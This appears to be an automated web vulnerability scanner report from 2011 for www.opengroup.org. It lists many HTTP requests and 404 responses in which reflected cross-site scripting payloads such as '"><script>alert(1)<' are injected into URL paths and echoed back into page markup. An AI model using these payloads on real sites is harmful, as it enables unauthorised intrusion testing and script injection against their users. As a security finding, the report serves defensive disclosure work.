| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:05 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:17 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:22 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture7c3a5--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:04 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture7c3a5--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture8a706<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:01 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture1879c"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:59 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture1879c"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc9ae1c<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:16 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-docf63af--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-docf63af--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc900bf"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:13 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:27 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:25 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:32 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:37 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:33 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /events78a8a<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5143 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /eventsf6b1d"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:04 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5152 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/eventsf6b1d"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /events1cf72--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5155 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /events1cf72--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /events/sponsor-exhibit Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:32 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5155 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /events/sponsor-exhibit ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /events/sponsor-exhibit Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:25 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5152 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/events/sponsor ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /events/sponsor-exhibit |
| GET /events/sponsor-exhibit Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5146 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /favicon.ico |
| GET /favicon.ico60e14--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4234 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /favicon.ico60e14--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /favicon.ico |
| GET /favicon.icod03a9<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:08 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4228 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /member/ |
| GET /member9518a"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5147 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/member9518a"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /member/ |
| GET /membere150e<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5141 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /member/ |
| GET /member55638--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:14 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5150 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /member55638--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf/ |
| GET /togafd840c--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:49:26 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4224 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /togafd840c--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf/ |
| GET /togaf26e07<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:49:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4218 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf977a7d"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5122 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/togaf977a7d"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf99edeb--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:00 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5125 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /togaf99edeb--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf94fa9b<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:57 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5113 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf9/certa8972--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
